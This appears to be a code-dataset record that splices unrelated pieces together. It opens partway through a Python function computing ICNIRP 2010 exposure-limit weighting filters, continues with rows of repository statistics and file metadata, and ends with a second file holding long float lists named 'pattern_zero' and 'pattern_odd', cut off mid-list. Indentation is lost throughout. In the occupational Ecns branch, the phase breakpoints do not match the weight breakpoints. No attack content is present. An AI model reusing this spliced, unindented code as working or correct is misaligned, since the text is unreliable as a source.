lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k])
den = np.array([1, a])
elif year == '2010':
if receptor == 'occupational':
if quantity == 'B':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[(f >= 1) & (f < 8)] = 1 / (0.2 / f[(f >= 1) & (f < 8)] ** 2 * np.sqrt(2))
weight_fun[(f >= 8) & (f < 25)] = 1 / (2.5e-2 / f[(f >= 8) & (f < 25)] * np.sqrt(2))
weight_fun[(f >= 25) & (f < 300)] = 1 / (1e-3 * np.sqrt(2))
weight_fun[(f >= 300) & (f < 3000)] = 1 / (0.3 / f[(f >= 300) & (f < 3000)] * np.sqrt(2))
weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (1e-4 * np.sqrt(2))
phase[(f >= 1) & (f < 8)] = isgn[(f >= 1) & (f < 8)] * 180
phase[(f >= 8) & (f < 25)] = isgn[(f >= 8) & (f < 25)] * 90
phase[(f >= 25) & (f < 300)] = 0
phase[(f >= 300) & (f < 3000)] = isgn[(f >= 300) & (f < 3000)] * 90
phase[(f >= 3000) & (f < 10e6)] = 0
elif domain == 'time':
# angular frequencies
a = 2 * np.pi * 8
b = 2 * np.pi * 25
c = 2 * np.pi * 300
d = 2 * np.pi * 3000
# filter parameters
fref = np.array([1])
s = 2j * np.pi * fref
Href = (s ** 2. * (s + c)) / ((s + a) * (s + b) * (s + d))
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k, k * c, 0, 0])
den = np.array([1, (a + b + d), (a * b + a * d + b * d), (a * b * d)])
elif quantity == 'Ecns':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[(f >= 1) & (f < 10)] = 1 / (0.5 / f[(f >= 1) & (f < 10)] * np.sqrt(2))
weight_fun[(f >= 10) & (f < 25)] = 1 / (0.05 * np.sqrt(2))
weight_fun[(f >= 25) & (f < 400)] = 1 / (2e-3 * f[(f >= 25) & (f < 400)] * np.sqrt(2))
weight_fun[(f >= 400) & (f < 3000)] = 1 / (0.8 * np.sqrt(2))
weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (2.7e-4 * f[(f >= 3000) & (f < 10e6)] * np.sqrt(2))
phase[(f >= 1) & (f < 10)] = 90 * isgn[(f >= 1) & (f < 10)]
phase[(f >= 10) & (f < 25)] = 0
phase[(f >= 25) & (f < 1000)] = -90 * isgn[(f >= 25) & (f < 1000)]
phase[(f >= 1000) & (f < 3000)] = 0
phase[(f >= 3000) & (f < 10e6)] = -90 * isgn[(f >= 3000) & (f < 10e6)]
elif domain == 'time':
# angular frequencies
a = 2 * np.pi * 10
b = 2 * np.pi * 25
c = 2 * np.pi * 400
d = 2 * np.pi * 3000
# filter parameters
fref = np.array([30e3])
s = 2j * np.pi * fref
Href = (s * (s + c)) / ((s + a) * (s + b) * (s + d))
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = [k, k * c, 0]
den = [1, (a + b + d), (a * b + a * d + b * d), a * b * d]
elif quantity == 'Epns':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[(f >= 1) & (f < 3000)] = 1 / (0.8 * np.sqrt(2))
weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (2.7e-4 * f[(f >= 3000) & (f < 10e6)] * np.sqrt(2))
phase[(f >= 1) & (f < 3000)] = 0
phase[(f >= 3000) & (f < 10e6)] = -90 * isgn[(f >= 3000) & (f < 10e6)]
elif domain == 'time':
# angular frequency
a = 2 * np.pi * 3000
# filter parameters
fref = np.array([1])
s = 2j * np.pi * fref
Href = 1 / (s + a)
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = [k]
den = [1, a]
elif receptor == 'public':
if quantity == 'B':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[(f >= 1) & (f < 8)] = 1 / (4e-2 / f[(f >= 1) & (f < 8)] ** 2 * np.sqrt(2))
weight_fun[(f >= 8) & (f < 25)] = 1 / (5e-3 / f[(f >= 8) & (f < 25)] * np.sqrt(2))
weight_fun[(f >= 25) & (f < 50)] = 1 / (2e-4 * np.sqrt(2))
weight_fun[(f >= 50) & (f < 400)] = 1 / (2e-4 * np.sqrt(2))
weight_fun[(f >= 400) & (f < 3000)] = 1 / (8e-2 / f[(f >= 400) & (f < 3000)] * np.sqrt(2))
weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (2.7e-5 * np.sqrt(2))
phase[(f >= 1) & (f < 8)] = 180 * isgn[(f >= 1) & (f < 8)]
phase[(f >= 8) & (f < 25)] = 90 * isgn[(f >= 8) & (f < 25)]
phase[(f >= 25) & (f < 50)] = 0
phase[(f >= 50) & (f < 400)] = 0
phase[(f >= 400) & (f < 3000)] = 90 * isgn[(f >= 400) & (f < 3000)]
phase[(f >= 3000) & (f < 10e6)] = 0
elif domain == 'time':
# angular frequency
a = 2 * np.pi * 8
b = 2 * np.pi * 25
c = 2 * np.pi * 400
d = 2 * np.pi * 3000
# filter parameters
fref = np.array([1])
s = 2j * np.pi * fref
Href = (s ** 2. * (s + c)) / ((s + a) * (s + b) * (s + d))
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k, k * c, 0, 0])
den = np.array([1, (a + b + d), (a * b + a * d + b * d), (a * b * d)])
elif quantity == 'Ecns':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[(f >= 1) & (f < 10)] = 1 / (0.1 / f[(f >= 1) & (f < 10)] * np.sqrt(2))
weight_fun[(f >= 10) & (f < 25)] = 1 / (0.01 * np.sqrt(2))
weight_fun[(f >= 25) & (f < 1000)] = 1 / (4e-4 * f[(f >= 25) & (f < 1000)] * np.sqrt(2))
weight_fun[(f >= 1000) & (f < 3000)] = 1 / (0.4 * np.sqrt(2))
weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (1.35e-4 * f[(f >= 3000) & (f < 10e6)] * np.sqrt(2))
phase[(f >= 1) & (f < 10)] = 90 * isgn[(f >= 1) & (f < 10)]
phase[(f >= 10) & (f < 25)] = 0
phase[(f >= 25) & (f < 1000)] = -90 * isgn[(f >= 25) & (f < 1000)]
phase[(f >= 1000) & (f < 3000)] = 0
phase[(f >= 3000) & (f < 10e6)] = -90 * isgn[(f >= 3000) & (f < 10e6)]
elif domain == 'time':
# angular frequencies
a = 2 * np.pi * 10
b = 2 * np.pi * 25
c = 2 * np.pi * 1000
d = 2 * np.pi * 3000
# filter parameters
fref = np.array([30e3])
s = 2j * np.pi * fref
Href = (s * (s + c)) / ((s + a) * (s + b) * (s + d))
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
num = [k, k * c, 0]
den = [1, (a + b + d), (a * b + a * d + b * d), a * b * d]
elif quantity == 'Epns':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[(f >= 1) & (f < 3000)] = 1 / (0.4 * np.sqrt(2))
weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (1.35e-4 * f[(f >= 3000) & (f < 10e6)] * np.sqrt(2))
phase[(f >= 1) & (f < 3000)] = 0
phase[(f >= 3000) & (f < 10e6)] = -90 * isgn[(f >= 3000) & (f < 10e6)]
elif domain == 'time':
# angular frequency
a = 2 * np.pi * 3000
# filter parameters
fref = np.array([1])
s = 2j * np.pi * fref
Href = 1 / (s + a)
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
num = [k]
den = [1, a]
# Assign outputs
if domain == 'time':
return num, den
elif domain == 'freq':
return weight_fun, phase
| 43.991468
| 120
| 0.351216
| 3,129
| 25,779
| 2.85938
| 0.060083
| 0.015201
| 0.046161
| 0.050855
| 0.844864
| 0.829552
| 0.824969
| 0.797474
| 0.776126
| 0.722477
| 0
| 0.129768
| 0.474184
| 25,779
| 585
| 121
| 44.066667
| 0.530284
| 0.096745
| 0
| 0.710456
| 0
| 0
| 0.009732
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005362
| false
| 0
| 0.002681
| 0
| 0.016086
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90b5cbf792bb5859b335491eb572f9b220402f95
| 93,307
|
py
|
Python
|
mysite/patterns/64.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 19
|
2016-06-17T23:36:27.000Z
|
2020-01-13T16:41:55.000Z
|
mysite/patterns/64.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 13
|
2016-06-06T12:57:05.000Z
|
2019-02-05T02:21:00.000Z
|
patterns/64.py
|
OmnesRes/GRIMMER
|
173c99ebdb6a9edb1242d24a791d0c5d778ff643
|
[
"MIT"
] | 7
|
2017-03-28T18:12:22.000Z
|
2021-06-16T09:32:59.000Z
|
pattern_zero=[0.0, 0.015380859375, 0.0302734375, 0.03125, 0.044677734375, 0.046630859375, 0.05859375, 0.0615234375, 0.0625, 0.072021484375, 0.075927734375, 0.077880859375, 0.0849609375, 0.08984375, 0.0927734375, 0.09375, 0.097412109375, 0.103271484375, 0.107177734375, 0.109130859375, 0.109375, 0.1162109375, 0.120849609375, 0.12109375, 0.1240234375, 0.125, 0.128662109375, 0.1318359375, 0.134521484375, 0.138427734375, 0.140380859375, 0.140625, 0.142333984375, 0.1474609375, 0.152099609375, 0.15234375, 0.1552734375, 0.15625, 0.159912109375, 0.161865234375, 0.1630859375, 0.165771484375, 0.169677734375, 0.1708984375, 0.171630859375, 0.171875, 0.173583984375, 0.1787109375, 0.179443359375, 0.183349609375, 0.18359375, 0.1865234375, 0.1875, 0.191162109375, 0.193115234375, 0.1943359375, 0.195068359375, 0.197021484375, 0.200927734375, 0.2021484375, 0.202880859375, 0.203125, 0.204833984375, 0.208740234375, 0.2099609375, 0.210693359375, 0.214599609375, 0.21484375, 0.2177734375, 0.21875, 0.220458984375, 0.222412109375, 0.224365234375, 0.2255859375, 0.226318359375, 0.228271484375, 0.230224609375, 0.232177734375, 0.2333984375, 0.234130859375, 0.234375, 0.236083984375, 0.238037109375, 0.239990234375, 0.2412109375, 0.241943359375, 0.243896484375, 0.245849609375, 0.24609375, 0.247802734375, 0.2490234375, 0.249755859375, 0.25, 0.251708984375, 0.253662109375, 0.255615234375, 0.2568359375, 0.257568359375, 0.259521484375, 0.261474609375, 0.263427734375, 0.2646484375, 0.265380859375, 0.265625, 0.267333984375, 0.269287109375, 0.271240234375, 0.2724609375, 0.273193359375, 0.275146484375, 0.277099609375, 0.27734375, 0.279052734375, 0.2802734375, 0.281005859375, 0.28125, 0.282958984375, 0.284912109375, 0.286865234375, 0.2880859375, 0.288818359375, 0.290771484375, 0.292724609375, 0.294677734375, 0.2958984375, 0.296630859375, 0.296875, 0.298583984375, 0.300537109375, 0.302490234375, 0.3037109375, 0.304443359375, 0.306396484375, 0.308349609375, 0.30859375, 0.310302734375, 0.3115234375, 0.312255859375, 0.3125, 0.314208984375, 0.316162109375, 0.318115234375, 0.3193359375, 0.320068359375, 0.322021484375, 0.323974609375, 0.325927734375, 0.3271484375, 0.327880859375, 0.328125, 0.329833984375, 0.331787109375, 0.333740234375, 0.3349609375, 0.335693359375, 0.337646484375, 0.339599609375, 0.33984375, 0.341552734375, 0.3427734375, 0.343505859375, 0.34375, 0.345458984375, 0.347412109375, 0.349365234375, 0.3505859375, 0.351318359375, 0.353271484375, 0.355224609375, 0.357177734375, 0.3583984375, 0.359130859375, 0.359375, 0.361083984375, 0.363037109375, 0.364990234375, 0.3662109375, 0.366943359375, 0.368896484375, 0.370849609375, 0.37109375, 0.372802734375, 0.3740234375, 0.374755859375, 0.375, 0.376708984375, 0.378662109375, 0.380615234375, 0.3818359375, 0.382568359375, 0.384521484375, 0.386474609375, 0.388427734375, 0.3896484375, 0.390380859375, 0.390625, 0.392333984375, 0.394287109375, 0.396240234375, 0.3974609375, 0.398193359375, 0.400146484375, 0.402099609375, 0.40234375, 0.404052734375, 0.4052734375, 0.406005859375, 0.40625, 0.407958984375, 0.409912109375, 0.411865234375, 0.4130859375, 0.413818359375, 0.415771484375, 0.417724609375, 0.419677734375, 0.4208984375, 0.421630859375, 0.421875, 0.423583984375, 0.425537109375, 0.427490234375, 0.4287109375, 0.429443359375, 0.431396484375, 0.433349609375, 0.43359375, 0.435302734375, 0.4365234375, 0.437255859375, 0.4375, 0.439208984375, 0.441162109375, 0.443115234375, 0.4443359375, 0.445068359375, 0.447021484375, 0.448974609375, 0.450927734375, 0.4521484375, 0.452880859375, 0.453125, 0.454833984375, 0.456787109375, 0.458740234375, 0.4599609375, 0.460693359375, 0.462646484375, 0.464599609375, 0.46484375, 0.466552734375, 0.4677734375, 0.468505859375, 0.46875, 0.470458984375, 0.472412109375, 0.474365234375, 0.4755859375, 0.476318359375, 0.478271484375, 0.480224609375, 0.482177734375, 0.4833984375, 0.484130859375, 0.484375, 0.486083984375, 0.488037109375, 0.489990234375, 0.4912109375, 0.491943359375, 0.493896484375, 0.495849609375, 0.49609375, 0.497802734375, 0.4990234375, 0.499755859375, 0.5, 0.501708984375, 0.503662109375, 0.505615234375, 0.5068359375, 0.507568359375, 0.509521484375, 0.511474609375, 0.513427734375, 0.5146484375, 0.515380859375, 0.515625, 0.517333984375, 0.519287109375, 0.521240234375, 0.5224609375, 0.523193359375, 0.525146484375, 0.527099609375, 0.52734375, 0.529052734375, 0.5302734375, 0.531005859375, 0.53125, 0.532958984375, 0.534912109375, 0.536865234375, 0.5380859375, 0.538818359375, 0.540771484375, 0.542724609375, 0.544677734375, 0.5458984375, 0.546630859375, 0.546875, 0.548583984375, 0.550537109375, 0.552490234375, 0.5537109375, 0.554443359375, 0.556396484375, 0.558349609375, 0.55859375, 0.560302734375, 0.5615234375, 0.562255859375, 0.5625, 0.564208984375, 0.566162109375, 0.568115234375, 0.5693359375, 0.570068359375, 0.572021484375, 0.573974609375, 0.575927734375, 0.5771484375, 0.577880859375, 0.578125, 0.579833984375, 0.581787109375, 0.583740234375, 0.5849609375, 0.585693359375, 0.587646484375, 0.589599609375, 0.58984375, 0.591552734375, 0.5927734375, 0.593505859375, 0.59375, 0.595458984375, 0.597412109375, 0.599365234375, 0.6005859375, 0.601318359375, 0.603271484375, 0.605224609375, 0.607177734375, 0.6083984375, 0.609130859375, 0.609375, 0.611083984375, 0.613037109375, 0.614990234375, 0.6162109375, 0.616943359375, 0.618896484375, 0.620849609375, 0.62109375, 0.622802734375, 0.6240234375, 0.624755859375, 0.625, 0.626708984375, 0.628662109375, 0.630615234375, 0.6318359375, 0.632568359375, 0.634521484375, 0.636474609375, 0.638427734375, 0.6396484375, 0.640380859375, 0.640625, 0.642333984375, 0.644287109375, 0.646240234375, 0.6474609375, 0.648193359375, 0.650146484375, 0.652099609375, 0.65234375, 0.654052734375, 0.6552734375, 0.656005859375, 0.65625, 0.657958984375, 0.659912109375, 0.661865234375, 0.6630859375, 0.663818359375, 0.665771484375, 0.667724609375, 0.669677734375, 0.6708984375, 0.671630859375, 0.671875, 0.673583984375, 0.675537109375, 0.677490234375, 0.6787109375, 0.679443359375, 0.681396484375, 0.683349609375, 0.68359375, 0.685302734375, 0.6865234375, 0.687255859375, 0.6875, 0.689208984375, 0.691162109375, 0.693115234375, 0.6943359375, 0.695068359375, 0.697021484375, 0.698974609375, 0.700927734375, 0.7021484375, 0.702880859375, 0.703125, 0.704833984375, 0.706787109375, 0.708740234375, 0.7099609375, 0.710693359375, 0.712646484375, 0.714599609375, 0.71484375, 0.716552734375, 0.7177734375, 0.718505859375, 0.71875, 0.720458984375, 0.722412109375, 0.724365234375, 0.7255859375, 0.726318359375, 0.728271484375, 0.730224609375, 0.732177734375, 0.7333984375, 0.734130859375, 0.734375, 0.736083984375, 0.738037109375, 0.739990234375, 0.7412109375, 0.741943359375, 0.743896484375, 0.745849609375, 0.74609375, 0.747802734375, 0.7490234375, 0.749755859375, 0.75, 0.751708984375, 0.753662109375, 0.755615234375, 0.7568359375, 0.757568359375, 0.759521484375, 0.761474609375, 0.763427734375, 0.7646484375, 0.765380859375, 0.765625, 0.767333984375, 0.769287109375, 0.771240234375, 0.7724609375, 0.773193359375, 0.775146484375, 0.777099609375, 0.77734375, 0.779052734375, 0.7802734375, 0.781005859375, 0.78125, 0.782958984375, 0.784912109375, 0.786865234375, 0.7880859375, 0.788818359375, 0.790771484375, 0.792724609375, 0.794677734375, 0.7958984375, 0.796630859375, 0.796875, 0.798583984375, 0.800537109375, 0.802490234375, 0.8037109375, 0.804443359375, 0.806396484375, 0.808349609375, 0.80859375, 0.810302734375, 0.8115234375, 0.812255859375, 0.8125, 0.814208984375, 0.816162109375, 0.818115234375, 0.8193359375, 0.820068359375, 0.822021484375, 0.823974609375, 0.825927734375, 0.8271484375, 0.827880859375, 0.828125, 0.829833984375, 0.831787109375, 0.833740234375, 0.8349609375, 0.835693359375, 0.837646484375, 0.839599609375, 0.83984375, 0.841552734375, 0.8427734375, 0.843505859375, 0.84375, 0.845458984375, 0.847412109375, 0.849365234375, 0.8505859375, 0.851318359375, 0.853271484375, 0.855224609375, 0.857177734375, 0.8583984375, 0.859130859375, 0.859375, 0.861083984375, 0.863037109375, 0.864990234375, 0.8662109375, 0.866943359375, 0.868896484375, 0.870849609375, 0.87109375, 0.872802734375, 0.8740234375, 0.874755859375, 0.875, 0.876708984375, 0.878662109375, 0.880615234375, 0.8818359375, 0.882568359375, 0.884521484375, 0.886474609375, 0.888427734375, 0.8896484375, 0.890380859375, 0.890625, 0.892333984375, 0.894287109375, 0.896240234375, 0.8974609375, 0.898193359375, 0.900146484375, 0.902099609375, 0.90234375, 0.904052734375, 0.9052734375, 0.906005859375, 0.90625, 0.907958984375, 0.909912109375, 0.911865234375, 0.9130859375, 0.913818359375, 0.915771484375, 0.917724609375, 0.919677734375, 0.9208984375, 0.921630859375, 0.921875, 0.923583984375, 0.925537109375, 0.927490234375, 0.9287109375, 0.929443359375, 0.931396484375, 0.933349609375, 0.93359375, 0.935302734375, 0.9365234375, 0.937255859375, 0.9375, 0.939208984375, 0.941162109375, 0.943115234375, 0.9443359375, 0.945068359375, 0.947021484375, 0.948974609375, 0.950927734375, 0.9521484375, 0.952880859375, 0.953125, 0.954833984375, 0.956787109375, 0.958740234375, 0.9599609375, 0.960693359375, 0.962646484375, 0.964599609375, 0.96484375, 0.966552734375, 0.9677734375, 0.968505859375, 0.96875, 0.970458984375, 0.972412109375, 0.974365234375, 0.9755859375, 0.976318359375, 0.978271484375, 0.980224609375, 0.982177734375, 0.9833984375, 0.984130859375, 0.984375, 0.986083984375, 0.988037109375, 0.989990234375, 0.9912109375, 0.991943359375, 0.993896484375, 0.995849609375, 0.99609375, 0.997802734375, 0.9990234375, 0.999755859375]
pattern_odd=[0.0, 0.001708984375, 0.003662109375, 0.005615234375, 0.0068359375, 0.007568359375, 0.009521484375, 0.011474609375, 0.013427734375, 0.0146484375, 0.015380859375, 0.015625, 0.017333984375, 0.019287109375, 0.021240234375, 0.0224609375, 0.023193359375, 0.025146484375, 0.027099609375, 0.02734375, 0.029052734375, 0.0302734375, 0.031005859375, 0.03125, 0.032958984375, 0.034912109375, 0.036865234375, 0.0380859375, 0.038818359375, 0.040771484375, 0.042724609375, 0.044677734375, 0.0458984375, 0.046630859375, 0.046875, 0.048583984375, 0.050537109375, 0.052490234375, 0.0537109375, 0.054443359375, 0.056396484375, 0.058349609375, 0.05859375, 0.060302734375, 0.0615234375, 0.062255859375, 0.0625, 0.064208984375, 0.066162109375, 0.068115234375, 0.0693359375, 0.070068359375, 0.072021484375, 0.073974609375, 0.075927734375, 0.0771484375, 0.077880859375, 0.078125, 0.079833984375, 0.081787109375, 0.083740234375, 0.0849609375, 0.085693359375, 0.087646484375, 0.089599609375, 0.08984375, 0.091552734375, 0.0927734375, 0.093505859375, 0.09375, 0.095458984375, 0.097412109375, 0.099365234375, 0.1005859375, 0.101318359375, 0.103271484375, 0.105224609375, 0.107177734375, 0.1083984375, 0.109130859375, 0.109375, 0.111083984375, 0.113037109375, 0.114990234375, 0.1162109375, 0.116943359375, 0.118896484375, 0.120849609375, 0.12109375, 0.122802734375, 0.1240234375, 0.124755859375, 0.125, 0.126708984375, 0.128662109375, 0.130615234375, 0.1318359375, 0.132568359375, 0.134521484375, 0.136474609375, 0.138427734375, 0.1396484375, 0.140380859375, 0.140625, 0.142333984375, 0.144287109375, 0.146240234375, 0.1474609375, 0.148193359375, 0.150146484375, 0.152099609375, 0.15234375, 0.154052734375, 0.1552734375, 0.156005859375, 0.15625, 0.157958984375, 0.159912109375, 0.161865234375, 0.1630859375, 0.163818359375, 0.165771484375, 0.167724609375, 0.169677734375, 0.1708984375, 0.171630859375, 0.171875, 0.173583984375, 0.175537109375, 0.177490234375, 0.1787109375, 0.179443359375, 0.181396484375, 0.183349609375, 0.18359375, 0.185302734375, 0.1865234375, 0.187255859375, 0.1875, 0.189208984375, 0.191162109375, 0.193115234375, 0.1943359375, 0.195068359375, 0.197021484375, 0.198974609375, 0.200927734375, 0.2021484375, 0.202880859375, 0.203125, 0.204833984375, 0.206787109375, 0.208740234375, 0.2099609375, 0.210693359375, 0.212646484375, 0.214599609375, 0.21484375, 0.216552734375, 0.2177734375, 0.218505859375, 0.21875, 0.220458984375, 0.222412109375, 0.224365234375, 0.2255859375, 0.226318359375, 0.228271484375, 0.230224609375, 0.232177734375, 0.2333984375, 0.234130859375, 0.234375, 0.236083984375, 0.238037109375, 0.239990234375, 0.2412109375, 0.241943359375, 0.243896484375, 0.245849609375, 0.24609375, 0.247802734375, 0.2490234375, 0.249755859375, 0.25, 0.251708984375, 0.253662109375, 0.255615234375, 0.2568359375, 0.257568359375, 0.259521484375, 0.261474609375, 0.263427734375, 0.2646484375, 0.265380859375, 0.265625, 0.267333984375, 0.269287109375, 0.271240234375, 0.2724609375, 0.273193359375, 0.275146484375, 0.277099609375, 0.27734375, 0.279052734375, 0.2802734375, 0.281005859375, 0.28125, 0.282958984375, 0.284912109375, 0.286865234375, 0.2880859375, 0.288818359375, 0.290771484375, 0.292724609375, 0.294677734375, 0.2958984375, 0.296630859375, 0.296875, 0.298583984375, 0.300537109375, 0.302490234375, 0.3037109375, 0.304443359375, 0.306396484375, 0.308349609375, 0.30859375, 0.310302734375, 0.3115234375, 0.312255859375, 0.3125, 0.314208984375, 0.316162109375, 0.318115234375, 0.3193359375, 0.320068359375, 0.322021484375, 0.323974609375, 0.325927734375, 0.3271484375, 0.327880859375, 0.328125, 0.329833984375, 0.331787109375, 0.333740234375, 0.3349609375, 0.335693359375, 0.337646484375, 0.339599609375, 0.33984375, 0.341552734375, 0.3427734375, 0.343505859375, 0.34375, 0.345458984375, 0.347412109375, 0.349365234375, 0.3505859375, 0.351318359375, 0.353271484375, 0.355224609375, 0.357177734375, 0.3583984375, 0.359130859375, 0.359375, 0.361083984375, 0.363037109375, 0.364990234375, 0.3662109375, 0.366943359375, 0.368896484375, 0.370849609375, 0.37109375, 0.372802734375, 0.3740234375, 0.374755859375, 0.375, 0.376708984375, 0.378662109375, 0.380615234375, 0.3818359375, 0.382568359375, 0.384521484375, 0.386474609375, 0.388427734375, 0.3896484375, 0.390380859375, 0.390625, 0.392333984375, 0.394287109375, 0.396240234375, 0.3974609375, 0.398193359375, 0.400146484375, 0.402099609375, 0.40234375, 0.404052734375, 0.4052734375, 0.406005859375, 0.40625, 0.407958984375, 0.409912109375, 0.411865234375, 0.4130859375, 0.413818359375, 0.415771484375, 0.417724609375, 0.419677734375, 0.4208984375, 0.421630859375, 0.421875, 0.423583984375, 0.425537109375, 0.427490234375, 0.4287109375, 0.429443359375, 0.431396484375, 0.433349609375, 0.43359375, 0.435302734375, 0.4365234375, 0.437255859375, 0.4375, 0.439208984375, 0.441162109375, 0.443115234375, 0.4443359375, 0.445068359375, 0.447021484375, 0.448974609375, 0.450927734375, 0.4521484375, 0.452880859375, 0.453125, 0.454833984375, 0.456787109375, 0.458740234375, 0.4599609375, 0.460693359375, 0.462646484375, 0.464599609375, 0.46484375, 0.466552734375, 0.4677734375, 0.468505859375, 0.46875, 0.470458984375, 0.472412109375, 0.474365234375, 0.4755859375, 0.476318359375, 0.478271484375, 0.480224609375, 0.482177734375, 0.4833984375, 0.484130859375, 0.484375, 0.486083984375, 0.488037109375, 0.489990234375, 0.4912109375, 0.491943359375, 0.493896484375, 0.495849609375, 0.49609375, 0.497802734375, 0.4990234375, 0.499755859375, 0.5, 0.501708984375, 0.503662109375, 0.505615234375, 0.5068359375, 0.507568359375, 0.509521484375, 0.511474609375, 0.513427734375, 0.5146484375, 0.515380859375, 0.515625, 0.517333984375, 0.519287109375, 0.521240234375, 0.5224609375, 0.523193359375, 0.525146484375, 0.527099609375, 0.52734375, 0.529052734375, 0.5302734375, 0.531005859375, 0.53125, 0.532958984375, 0.534912109375, 0.536865234375, 0.5380859375, 0.538818359375, 0.540771484375, 0.542724609375, 0.544677734375, 0.5458984375, 0.546630859375, 0.546875, 0.548583984375, 0.550537109375, 0.552490234375, 0.5537109375, 0.554443359375, 0.556396484375, 0.558349609375, 0.55859375, 0.560302734375, 0.5615234375, 0.562255859375, 0.5625, 0.564208984375, 0.566162109375, 0.568115234375, 0.5693359375, 0.570068359375, 0.572021484375, 0.573974609375, 0.575927734375, 0.5771484375, 0.577880859375, 0.578125, 0.579833984375, 0.581787109375, 0.583740234375, 0.5849609375, 0.585693359375, 0.587646484375, 0.589599609375, 0.58984375, 0.591552734375, 0.5927734375, 0.593505859375, 0.59375, 0.595458984375, 0.597412109375, 0.599365234375, 0.6005859375, 0.601318359375, 0.603271484375, 0.605224609375, 0.607177734375, 0.6083984375, 0.609130859375, 0.609375, 0.611083984375, 0.613037109375, 0.614990234375, 0.6162109375, 0.616943359375, 0.618896484375, 0.620849609375, 0.62109375, 0.622802734375, 0.6240234375, 0.624755859375, 0.625, 0.626708984375, 0.628662109375, 0.630615234375, 0.6318359375, 0.632568359375, 0.634521484375, 0.636474609375, 0.638427734375, 0.6396484375, 0.640380859375, 0.640625, 0.642333984375, 0.644287109375, 0.646240234375, 0.6474609375, 0.648193359375, 0.650146484375, 0.652099609375, 0.65234375, 0.654052734375, 0.6552734375, 0.656005859375, 0.65625, 0.657958984375, 0.659912109375, 0.661865234375, 0.6630859375, 0.663818359375, 0.665771484375, 0.667724609375, 0.669677734375, 0.6708984375, 0.671630859375, 0.671875, 0.673583984375, 0.675537109375, 0.677490234375, 0.6787109375, 0.679443359375, 0.681396484375, 0.683349609375, 0.68359375, 0.685302734375, 0.6865234375, 0.687255859375, 0.6875, 0.689208984375, 0.691162109375, 0.693115234375, 0.6943359375, 0.695068359375, 0.697021484375, 0.698974609375, 0.700927734375, 0.7021484375, 0.702880859375, 0.703125, 0.704833984375, 0.706787109375, 0.708740234375, 0.7099609375, 0.710693359375, 0.712646484375, 0.714599609375, 0.71484375, 0.716552734375, 0.7177734375, 0.718505859375, 0.71875, 0.720458984375, 0.722412109375, 0.724365234375, 0.7255859375, 0.726318359375, 0.728271484375, 0.730224609375, 0.732177734375, 0.7333984375, 0.734130859375, 0.734375, 0.736083984375, 0.738037109375, 0.739990234375, 0.7412109375, 0.741943359375, 0.743896484375, 0.745849609375, 0.74609375, 0.747802734375, 0.7490234375, 0.749755859375, 0.75, 0.751708984375, 0.753662109375, 0.755615234375, 0.7568359375, 0.757568359375, 0.759521484375, 0.761474609375, 0.763427734375, 0.7646484375, 0.765380859375, 0.765625, 0.767333984375, 0.769287109375, 0.771240234375, 0.7724609375, 0.773193359375, 0.775146484375, 0.777099609375, 0.77734375, 0.779052734375, 0.7802734375, 0.781005859375, 0.78125, 0.782958984375, 0.784912109375, 0.786865234375, 0.7880859375, 0.788818359375, 0.790771484375, 0.792724609375, 0.794677734375, 0.7958984375, 0.796630859375, 0.796875, 0.798583984375, 0.800537109375, 0.802490234375, 0.8037109375, 0.804443359375, 0.806396484375, 0.808349609375, 0.80859375, 0.810302734375, 0.8115234375, 0.812255859375, 0.8125, 0.814208984375, 0.816162109375, 0.818115234375, 0.8193359375, 0.820068359375, 0.822021484375, 0.823974609375, 0.825927734375, 0.8271484375, 0.827880859375, 0.828125, 0.829833984375, 0.831787109375, 0.833740234375, 0.8349609375, 0.835693359375, 0.837646484375, 0.839599609375, 0.83984375, 0.841552734375, 0.8427734375, 0.843505859375, 0.84375, 0.845458984375, 0.847412109375, 